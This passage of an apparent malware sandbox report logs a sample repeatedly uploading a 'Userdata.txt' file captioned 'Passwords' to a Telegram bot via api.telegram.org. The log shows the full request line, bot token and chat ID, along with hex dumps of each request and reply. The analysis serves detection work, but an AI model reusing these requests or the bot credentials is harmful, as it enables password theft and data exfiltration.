                                                                                                              2025-01-10 22:39:10 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 39 64 38 34 65 34 65 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd3209d84e4e33Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:10 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:10 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:10 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 35 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43675,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548750,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.849894149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:11 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd321e78449c5f
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 65 37 38 34 34 39 63 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd321e78449c5fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:12 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:12 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:12 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43676,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548752,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.849909149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:13 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd3233099429ec
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 33 30 39 39 34 32 39 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd3233099429ecContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:13 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:13 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:13 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43677,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548753,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.849920149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:15 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32478c38febd
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 37 38 63 33 38 66 65 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32478c38febdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:15 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:15 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:15 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43678,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548755,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.849933149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:16 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd325eb93757f9
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 65 62 39 33 37 35 37 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd325eb93757f9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:17 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:17 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:17 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43679,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548757,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.849945149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:18 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd3270658e9d73
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:39:18 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 30 36 35 38 65 39 64 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd3270658e9d73Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:18 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:18 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:18 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43680,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548758,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.849959149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:20 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd3284bc2d1cb5
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 22:39:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 34 62 63 32 64 31 63 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd3284bc2d1cb5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 22:39:20 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 22:39:20 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 22:39:20 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 38 37 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43681,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736548760,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.849971149.154.167.2204435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:39:21 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd3299042231bc
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
